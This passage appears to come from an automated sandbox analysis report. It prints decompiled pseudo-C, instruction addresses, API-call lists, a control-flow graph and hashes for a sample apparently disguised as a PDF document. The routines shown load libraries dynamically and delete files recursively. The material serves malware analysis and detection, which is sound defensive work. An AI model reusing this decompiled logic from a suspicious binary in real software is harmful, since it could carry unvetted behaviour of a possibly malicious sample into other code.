							_t217 = GetModuleHandleW(_t312);
							__eflags = _t217 - _t284;
							 *(_t319 + 0x1008) = _t217;
							if(_t217 != _t284) {
								L150:
								_t183 = _t319 + 0x808; // 0x808
								_t313 = _t183;
								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
								__eflags = _t218 - _t284;
								 *(_t319 + 0x100c) = _t218;
								if(_t218 == _t284) {
									__eflags =  *_t313 - 0x23;
									if( *_t313 == 0x23) {
										_t186 = _t319 + 0x80a; // 0x80a
										_t222 = E10001311(_t186);
										__eflags = _t222 - _t284;
										if(_t222 != _t284) {
											__eflags = _t222 & 0xffff0000;
											if((_t222 & 0xffff0000) == 0) {
												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t284;
								if(_v48 != _t284) {
									L157:
									_t313[lstrlenW(_t313)] = 0x57;
									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
									__eflags = _t220 - _t284;
									if(_t220 != _t284) {
										L145:
										 *(_t319 + 0x100c) = _t220;
										goto L161;
									}
									__eflags =  *(_t319 + 0x100c) - _t284;
									L159:
									if(__eflags != 0) {
										goto L161;
									}
									L160:
									_t197 = _t319 + 4;
									 *_t197 =  *(_t319 + 4) | 0xffffffff;
									__eflags =  *_t197;
									goto L161;
								} else {
									__eflags =  *(_t319 + 0x100c) - _t284;
									if( *(_t319 + 0x100c) != _t284) {
										goto L161;
									}
									goto L157;
								}
							}
							_t225 = LoadLibraryW(_t312); // executed
							__eflags = _t225 - _t284;
							 *(_t319 + 0x1008) = _t225;
							if(_t225 == _t284) {
								goto L160;
							}
							goto L150;
						}
						_t179 = _t319 + 0x808; // 0x808
						_t227 = E10001311(_t179);
						 *(_t319 + 0x100c) = _t227;
						__eflags = _t227 - _t284;
						goto L159;
					}
					_t228 = _t216 - 1;
					if(_t228 == 0) {
						_t176 = _t319 + 0x808; // 0x808
						_t229 = _t176;
						__eflags =  *_t229 - _t284;
						if( *_t229 == _t284) {
							goto L161;
						}
						_t220 = E10001311(_t229);
						L144:
						goto L145;
					}
					if(_t228 != 1) {
						goto L161;
					}
					_t80 = _t319 + 8; // 0x8
					_t285 = _t80;
					_t314 = E10001311(_t80);
					 *(_t319 + 0x1008) = _t314;
					if(_t314 == 0) {
						goto L160;
					}
					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
					_t89 = _t319 + 0x808; // 0x808
					_t220 =  *(_t314->i + E10001311(_t89) * 4);
					goto L144;
				}
			}
































































                                                                      0x10001b20
                                                                      0x10001b23
                                                                      0x10001b26
                                                                      0x10001b29
                                                                      0x10001b2c
                                                                      0x10001b2f
                                                                      0x10001b32
                                                                      0x10001b34
                                                                      0x10001b37
                                                                      0x10001b3c
                                                                      0x10001b3f
                                                                      0x10001b47
                                                                      0x10001b4f
                                                                      0x10001b51
                                                                      0x10001b54
                                                                      0x10001b5c
                                                                      0x10001b5c
                                                                      0x10001b61
                                                                      0x10001b64
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001b6e
                                                                      0x10001b71
                                                                      0x10001b76
                                                                      0x10001b78
                                                                      0x10001beb
                                                                      0x10001beb
                                                                      0x10001beb
                                                                      0x10001bef
                                                                      0x10001bf2
                                                                      0x10001bf4
                                                                      0x10001c16
                                                                      0x10001c18
                                                                      0x10001c1b
                                                                      0x10001c24
                                                                      0x10001c2a
                                                                      0x10001c2c
                                                                      0x10001c32
                                                                      0x10001c32
                                                                      0x10001c38
                                                                      0x10001c3b
                                                                      0x10001c3b
                                                                      0x10001c3e
                                                                      0x10001c3e
                                                                      0x10001c44
                                                                      0x10001c46
                                                                      0x10001c46
                                                                      0x10001c48
                                                                      0x10001c4b
                                                                      0x10001c4e
                                                                      0x10001c54
                                                                      0x10001c5a
                                                                      0x10001c5d
                                                                      0x10001c81
                                                                      0x10001c84
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001c87
                                                                      0x10001c89
                                                                      0x10001c97
                                                                      0x10001c9a
                                                                      0x10001c9c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001c9e
                                                                      0x10001c9e
                                                                      0x10001c9e
                                                                      0x10001ca4
                                                                      0x10001ca6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001ca8
                                                                      0x10001caa
                                                                      0x10001cac
                                                                      0x10001cae
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001cae
                                                                      0x10001cb0
                                                                      0x10001cb2
                                                                      0x10001cb4
                                                                      0x10001cb4
                                                                      0x10001cba
                                                                      0x10001cc0
                                                                      0x10001cc2
                                                                      0x10001cd6
                                                                      0x10001cd6
                                                                      0x10001cd8
                                                                      0x10001cc4
                                                                      0x10001cca
                                                                      0x10001ccd
                                                                      0x10001ccd
                                                                      0x00000000
                                                                      0x10001c5f
                                                                      0x10001c5f
                                                                      0x10001c5f
                                                                      0x10001c60
                                                                      0x10001c68
                                                                      0x10001c6c
                                                                      0x10001c72
                                                                      0x10001c76
                                                                      0x10001cde
                                                                      0x10001ce1
                                                                      0x10001ce5
                                                                      0x10001d70
                                                                      0x10001d74
                                                                      0x10001b59
                                                                      0x00000000
                                                                      0x10001b59
                                                                      0x00000000
                                                                      0x10001d74
                                                                      0x10001c62
                                                                      0x10001c62
                                                                      0x10001c63
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001c65
                                                                      0x10001c66
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001c66
                                                                      0x10001c5d
                                                                      0x10001bf7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001c00
                                                                      0x10001c03
                                                                      0x10001c10
                                                                      0x10001c10
                                                                      0x10001c05
                                                                      0x00000000
                                                                      0x10001c05
                                                                      0x10001b7a
                                                                      0x10001b7d
                                                                      0x10001bce
                                                                      0x10001bd1
                                                                      0x10001be3
                                                                      0x10001be3
                                                                      0x10001be6
                                                                      0x00000000
                                                                      0x10001be6
                                                                      0x10001bd3
                                                                      0x10001bd8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001bda
                                                                      0x10001bdd
                                                                      0x10001ced
                                                                      0x10001cf0
                                                                      0x10001cf0
                                                                      0x10001cf2
                                                                      0x10002048
                                                                      0x1000204b
                                                                      0x100020b2
                                                                      0x10001d60
                                                                      0x10001d63
                                                                      0x10001d66
                                                                      0x10001d69
                                                                      0x10001d69
                                                                      0x10001d6b
                                                                      0x10001d6c
                                                                      0x10001d6c
                                                                      0x10001d6d
                                                                      0x00000000
                                                                      0x10001d6d
                                                                      0x1000204d
                                                                      0x10002050
                                                                      0x10002057
                                                                      0x10002057
                                                                      0x1000205b
                                                                      0x1000206f
                                                                      0x1000206f
                                                                      0x10002072
                                                                      0x10002076
                                                                      0x100020be
                                                                      0x100020c1
                                                                      0x100020c5
                                                                      0x00000000
                                                                      0x100020c5
                                                                      0x10002078
                                                                      0x1000207c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1000207e
                                                                      0x10002085
                                                                      0x10002085
                                                                      0x1000208b
                                                                      0x1000208e
                                                                      0x100020aa
                                                                      0x10002090
                                                                      0x10002099
                                                                      0x1000209c
                                                                      0x1000209c
                                                                      0x00000000
                                                                      0x1000208e
                                                                      0x1000205d
                                                                      0x10002060
                                                                      0x10002064
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002066
                                                                      0x00000000
                                                                      0x10002066
                                                                      0x10002052
                                                                      0x10002055
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002055
                                                                      0x10001cf8
                                                                      0x10001cf8
                                                                      0x10001cf9
                                                                      0x10001e29
                                                                      0x10001e29
                                                                      0x10001e2e
                                                                      0x10001e31
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001e3e
                                                                      0x00000000
                                                                      0x10001fe5
                                                                      0x10001fe8
                                                                      0x10001feb
                                                                      0x10001feb
                                                                      0x10001fec
                                                                      0x10001fed
                                                                      0x10001ff0
                                                                      0x10001ff3
                                                                      0x10001ff6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001ff8
                                                                      0x10001ff8
                                                                      0x10001ffc
                                                                      0x10002014
                                                                      0x10002017
                                                                      0x10002021
                                                                      0x00000000
                                                                      0x10002021
                                                                      0x10001ffe
                                                                      0x10001ffe
                                                                      0x10002001
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002003
                                                                      0x10002006
                                                                      0x10002008
                                                                      0x10002009
                                                                      0x10002009
                                                                      0x10002009
                                                                      0x1000200a
                                                                      0x1000200d
                                                                      0x10002010
                                                                      0x10002011
                                                                      0x10001feb
                                                                      0x10001fec
                                                                      0x10001fed
                                                                      0x10001ff0
                                                                      0x10001ff3
                                                                      0x10001ff6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001ff6
                                                                      0x00000000
                                                                      0x10001e85
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001e91
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001e78
                                                                      0x10001e7c
                                                                      0x10001e80
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001fb6
                                                                      0x10001fba
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001fc0
                                                                      0x10001fc9
                                                                      0x10001fd0
                                                                      0x10001fd8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001f53
                                                                      0x10001f53
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001e9a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002040
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002030
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002034
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1000203c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001f76
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001f5b
                                                                      0x10001f5d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001f7e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001f63
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001f67
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002038
                                                                      0x10002042
                                                                      0x10002042
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001f86
                                                                      0x10001f8a
                                                                      0x10001f8f
                                                                      0x10001f92
                                                                      0x10001f93
                                                                      0x10001f96
                                                                      0x10001f9c
                                                                      0x10001f9c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002028
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001f6b
                                                                      0x10001f6e
                                                                      0x10001f70
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001ea1
                                                                      0x10001ea1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001f7a
                                                                      0x10001f80
                                                                      0x10001f80
                                                                      0x10001ea3
                                                                      0x10001ea3
                                                                      0x10001ea6
                                                                      0x10001ead
                                                                      0x10001eb0
                                                                      0x10001eb2
                                                                      0x10001eb4
                                                                      0x10001eb5
                                                                      0x10001eb9
                                                                      0x10001ebc
                                                                      0x10001ec2
                                                                      0x10001ec8
                                                                      0x10001ec8
                                                                      0x10001eca
                                                                      0x10001eca
                                                                      0x10001ecd
                                                                      0x10001ed3
                                                                      0x10001ed5
                                                                      0x10001ed9
                                                                      0x10001ede
                                                                      0x10001ede
                                                                      0x10001ee0
                                                                      0x10001ee0
                                                                      0x10001ee3
                                                                      0x10001ee6
                                                                      0x10001eef
                                                                      0x10001ef5
                                                                      0x10001ef8
                                                                      0x10001ef8
                                                                      0x10001efa
                                                                      0x10001efd
                                                                      0x10001f03
                                                                      0x00000000
                                                                      0x10001f03
                                                                      0x10001ec4
                                                                      0x10001ec6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001e45
                                                                      0x10001e4b
                                                                      0x10001e4e
                                                                      0x10001e50
                                                                      0x10001e50
                                                                      0x10001e53
                                                                      0x10001e57
                                                                      0x10001e64
                                                                      0x10001e66
                                                                      0x10001e6c
                                                                      0x10001e6c
                                                                      0x10001e6c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001fa4
                                                                      0x10001fa8
                                                                      0x10001fad
                                                                      0x10001fb0
                                                                      0x10001f09
                                                                      0x10001f09
                                                                      0x10001f0b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001f11
                                                                      0x10001f11
                                                                      0x10001f15
                                                                      0x10001f1c
                                                                      0x10001f40
                                                                      0x10001f40
                                                                      0x10001f44
                                                                      0x10001f46
                                                                      0x10001f49
                                                                      0x10001f49
                                                                      0x10001f4c
                                                                      0x10001f4c
                                                                      0x00000000
                                                                      0x10001f44
                                                                      0x10001f21
                                                                      0x10001f24
                                                                      0x10001f24
                                                                      0x10001f2b
                                                                      0x10001f2d
                                                                      0x10001f30
                                                                      0x10001f37
                                                                      0x10001f38
                                                                      0x10001f3e
                                                                      0x10001f3e
                                                                      0x00000000
                                                                      0x10001f3e
                                                                      0x10001f32
                                                                      0x10001f35
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001e3e
                                                                      0x10001cff
                                                                      0x10001cff
                                                                      0x10001d00
                                                                      0x10001e26
                                                                      0x00000000
                                                                      0x10001e26
                                                                      0x10001d06
                                                                      0x10001d07
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001d0f
                                                                      0x10001d0f
                                                                      0x10001d12
                                                                      0x10001d5d
                                                                      0x00000000
                                                                      0x10001d5d
                                                                      0x10001d14
                                                                      0x10001d14
                                                                      0x10001d17
                                                                      0x10001d41
                                                                      0x10001d44
                                                                      0x10001d47
                                                                      0x10001e18
                                                                      0x10001e18
                                                                      0x10001e18
                                                                      0x10001d4d
                                                                      0x10001d4d
                                                                      0x10001d4d
                                                                      0x10001e1e
                                                                      0x00000000
                                                                      0x10001e1e
                                                                      0x10001d1a
                                                                      0x10001d1a
                                                                      0x10001d1b
                                                                      0x10001d3e
                                                                      0x10001d40
                                                                      0x10001d40
                                                                      0x00000000
                                                                      0x10001d40
                                                                      0x10001d1d
                                                                      0x10001d1d
                                                                      0x10001d20
                                                                      0x10001d3a
                                                                      0x00000000
                                                                      0x10001d3a
                                                                      0x10001d22
                                                                      0x10001d22
                                                                      0x10001d25
                                                                      0x10001d36
                                                                      0x00000000
                                                                      0x10001d36
                                                                      0x10001d27
                                                                      0x10001d27
                                                                      0x10001d28
                                                                      0x10001d32
                                                                      0x00000000
                                                                      0x10001d32
                                                                      0x10001d2b
                                                                      0x10001d2c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001d2e
                                                                      0x00000000
                                                                      0x10001d2e
                                                                      0x00000000
                                                                      0x10001bdd
                                                                      0x10001b7f
                                                                      0x10001b82
                                                                      0x10001bb1
                                                                      0x10001bb5
                                                                      0x10001bbc
                                                                      0x10001bc3
                                                                      0x10001bc6
                                                                      0x10001bc9
                                                                      0x00000000
                                                                      0x10001bc9
                                                                      0x10001b84
                                                                      0x10001b85
                                                                      0x10001ba0
                                                                      0x10001ba7
                                                                      0x10001baa
                                                                      0x00000000
                                                                      0x10001baa
                                                                      0x10001b8a
                                                                      0x00000000
                                                                      0x10001b90
                                                                      0x10001b90
                                                                      0x10001b97
                                                                      0x00000000
                                                                      0x10001b97
                                                                      0x10001b8a
                                                                      0x10001d83
                                                                      0x10001d88
                                                                      0x10001d8d
                                                                      0x10001d91
                                                                      0x100021c5
                                                                      0x100021cb
                                                                      0x10001da3
                                                                      0x10001da5
                                                                      0x10001da6
                                                                      0x100020ee
                                                                      0x100020ee
                                                                      0x100020f1
                                                                      0x100020f4
                                                                      0x10002111
                                                                      0x10002117
                                                                      0x10002119
                                                                      0x1000211f
                                                                      0x10002136
                                                                      0x10002136
                                                                      0x10002136
                                                                      0x10002143
                                                                      0x10002149
                                                                      0x1000214c
                                                                      0x10002152
                                                                      0x10002154
                                                                      0x10002158
                                                                      0x1000215a
                                                                      0x10002161
                                                                      0x10002166
                                                                      0x10002169
                                                                      0x1000216b
                                                                      0x10002170
                                                                      0x10002182
                                                                      0x10002182
                                                                      0x10002170
                                                                      0x10002169
                                                                      0x10002158
                                                                      0x10002188
                                                                      0x1000218b
                                                                      0x10002195
                                                                      0x1000219d
                                                                      0x100021aa
                                                                      0x100021b0
                                                                      0x100021b3
                                                                      0x100020e3
                                                                      0x100020e3
                                                                      0x00000000
                                                                      0x100020e3
                                                                      0x100021b9
                                                                      0x100021bf
                                                                      0x100021bf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100021c1
                                                                      0x100021c1
                                                                      0x100021c1
                                                                      0x100021c1
                                                                      0x00000000
                                                                      0x1000218d
                                                                      0x1000218d
                                                                      0x10002193
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002193
                                                                      0x1000218b
                                                                      0x10002122
                                                                      0x10002128
                                                                      0x1000212a
                                                                      0x10002130
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002130
                                                                      0x100020f6
                                                                      0x100020fd
                                                                      0x10002103
                                                                      0x10002109
                                                                      0x00000000
                                                                      0x10002109
                                                                      0x10001dac
                                                                      0x10001dad
                                                                      0x100020cd
                                                                      0x100020cd
                                                                      0x100020d3
                                                                      0x100020d6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100020dd
                                                                      0x100020e2
                                                                      0x00000000
                                                                      0x100020e2
                                                                      0x10001db4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001dba
                                                                      0x10001dba
                                                                      0x10001dc3
                                                                      0x10001dc8
                                                                      0x10001dce
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001dd4
                                                                      0x10001de1
                                                                      0x10001de7
                                                                      0x10001df1
                                                                      0x10001df7
                                                                      0x10001dff
                                                                      0x10001e0f
                                                                      0x00000000
                                                                      0x10001e0f

                                                                      APIs
                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                      • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                      • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                      • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                      • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                      • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167633537010.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000002.00000002.167633501084.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167633578927.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167633608441.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_10000000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$lstrcpy$Alloc
                                                                      • String ID:
                                                                      • API String ID: 4227406936-0
                                                                      • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                      • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                      • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                      • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405A03 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 693 405a03-405a29 call 405cce 696 405a42-405a49 693->696 697 405a2b-405a3d DeleteFileW 693->697 699 405a4b-405a4d 696->699 700 405a5c-405a6c call 406212 696->700 698 405bbf-405bc3 697->698 701 405a53-405a56 699->701 702 405b6d-405b72 699->702 706 405a7b-405a7c call 405c12 700->706 707 405a6e-405a79 lstrcatW 700->707 701->700 701->702 702->698 705 405b74-405b77 702->705 708 405b81-405b89 call 406555 705->708 709 405b79-405b7f 705->709 710 405a81-405a85 706->710 707->710 708->698 717 405b8b-405b9f call 405bc6 call 4059bb 708->717 709->698 713 405a91-405a97 lstrcatW 710->713 714 405a87-405a8f 710->714 716 405a9c-405ab8 lstrlenW FindFirstFileW 713->716 714->713 714->716 718 405b62-405b66 716->718 719 405abe-405ac6 716->719 733 405ba1-405ba4 717->733 734 405bb7-405bba call 405371 717->734 718->702 722 405b68 718->722 723 405ae6-405afa call 406212 719->723 724 405ac8-405ad0 719->724 722->702 735 405b11-405b1c call 4059bb 723->735 736 405afc-405b04 723->736 727 405ad2-405ada 724->727 728 405b45-405b55 FindNextFileW 724->728 727->723 729 405adc-405ae4 727->729 728->719 732 405b5b-405b5c FindClose 728->732 729->723 729->728 732->718 733->709 737 405ba6-405bb5 call 405371 call 4060b3 733->737 734->698 746 405b3d-405b40 call 405371 735->746 747 405b1e-405b21 735->747 736->728 738 405b06-405b0f call 405a03 736->738 737->698 738->728 746->728 750 405b23-405b33 call 405371 call 4060b3 747->750 751 405b35-405b3b 747->751 750->728 751->728
                                                                      C-Code - Quality: 98%
                                                                      			E00405A03(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405CCE(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2c8 =  *0x42a2c8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406212(0x425730, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C12(_t68);
					} else {
						lstrcatW(0x425730, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425730,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406212(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E004059BB(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E00405371(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2c8 =  *0x42a2c8 + 1;
										} else {
											E00405371(0xfffffff1, _t68);
											E004060B3(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405A03(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x425730 - 0x5c;
					if( *0x425730 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406555(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405BC6(_t68);
							_t38 = E004059BB(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E00405371(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E00405371(0xfffffff1, _t68);
							return E004060B3(_t67, _t68, 0);
						}
						L30:
						 *0x42a2c8 =  *0x42a2c8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                      0x00405a0d
                                                                      0x00405a12
                                                                      0x00405a1b
                                                                      0x00405a1e
                                                                      0x00405a26
                                                                      0x00405a29
                                                                      0x00405a2c
                                                                      0x00405a34
                                                                      0x00405a36
                                                                      0x00405a37
                                                                      0x00000000
                                                                      0x00405a37
                                                                      0x00405a42
                                                                      0x00405a45
                                                                      0x00405a45
                                                                      0x00405a45
                                                                      0x00405a49
                                                                      0x00405a5c
                                                                      0x00405a63
                                                                      0x00405a68
                                                                      0x00405a6c
                                                                      0x00405a7c
                                                                      0x00405a6e
                                                                      0x00405a74
                                                                      0x00405a74
                                                                      0x00405a81
                                                                      0x00405a85
                                                                      0x00405a91
                                                                      0x00405a97
                                                                      0x00405a9c
                                                                      0x00405aa2
                                                                      0x00405aad
                                                                      0x00405ab3
                                                                      0x00405ab5
                                                                      0x00405ab8
                                                                      0x00405b62
                                                                      0x00405b62
                                                                      0x00405b66
                                                                      0x00405b68
                                                                      0x00405b68
                                                                      0x00405b68
                                                                      0x00405b68
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405abe
                                                                      0x00405abe
                                                                      0x00405abe
                                                                      0x00405ac6
                                                                      0x00405ae6
                                                                      0x00405aee
                                                                      0x00405af3
                                                                      0x00405afa
                                                                      0x00405b15
                                                                      0x00405b1a
                                                                      0x00405b1c
                                                                      0x00405b40
                                                                      0x00405b1e
                                                                      0x00405b1e
                                                                      0x00405b21
                                                                      0x00405b35
                                                                      0x00405b23
                                                                      0x00405b26
                                                                      0x00405b2e
                                                                      0x00405b2e
                                                                      0x00405b21
                                                                      0x00405afc
                                                                      0x00405b02
                                                                      0x00405b04
                                                                      0x00405b0a
                                                                      0x00405b0a
                                                                      0x00405b04
                                                                      0x00000000
                                                                      0x00405afa
                                                                      0x00405ac8
                                                                      0x00405ad0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405ad2
                                                                      0x00405ada
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405adc
                                                                      0x00405ae4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405b45
                                                                      0x00405b4d
                                                                      0x00405b53
                                                                      0x00405b53
                                                                      0x00405b5c
                                                                      0x00000000
                                                                      0x00405b5c
                                                                      0x00405a87
                                                                      0x00405a8f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405a4b
                                                                      0x00405a4b
                                                                      0x00405a4d
                                                                      0x00405b6d
                                                                      0x00405b6f
                                                                      0x00405b72
                                                                      0x00405bc3
                                                                      0x00405bc3
                                                                      0x00405bc3
                                                                      0x00405b74
                                                                      0x00405b77
                                                                      0x00405b82
                                                                      0x00405b87
                                                                      0x00405b89
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405b8c
                                                                      0x00405b98
                                                                      0x00405b9d
                                                                      0x00405b9f
                                                                      0x00000000
                                                                      0x00405bba
                                                                      0x00405ba1
                                                                      0x00405ba4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405ba9
                                                                      0x00000000
                                                                      0x00405bb0
                                                                      0x00405b79
                                                                      0x00405b79
                                                                      0x00000000
                                                                      0x00405b79
                                                                      0x00405a53
                                                                      0x00405a56
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405a56

                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(?,?,76A63420,76A62EE0,00000000), ref: 00405A2C
                                                                      • lstrcatW.KERNEL32(00425730,\*.*), ref: 00405A74
                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405A97
                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,76A63420,76A62EE0,00000000), ref: 00405A9D
